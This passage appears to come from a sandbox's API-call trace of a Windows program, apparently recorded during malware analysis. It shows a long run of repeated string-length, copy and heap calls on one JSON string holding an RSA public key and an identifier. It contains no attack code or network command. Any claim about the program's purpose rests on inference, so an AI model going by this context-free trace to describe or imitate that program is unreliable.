KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.958] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.959] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.959] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c5f78 | out: hHeap=0x31d0000) returned 1 [0125.959] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.959] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x43a) returned 0x62c4908 [0125.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12a5a778, cbMultiByte=-1, lpWideCharStr=0x62c4908, cchWideChar=541 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 541 [0125.959] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.959] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0125.959] lstrlenA (lpString="\",\"id\":\"") returned 8 [0125.959] lstrcpyA (in: lpString1=0x12a5ab78, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.959] lstrcpyA (in: lpString1=0x12a5a778, lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" | out: lpString1="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}" [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA (lpString="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 42 [0125.959] lstrlenA 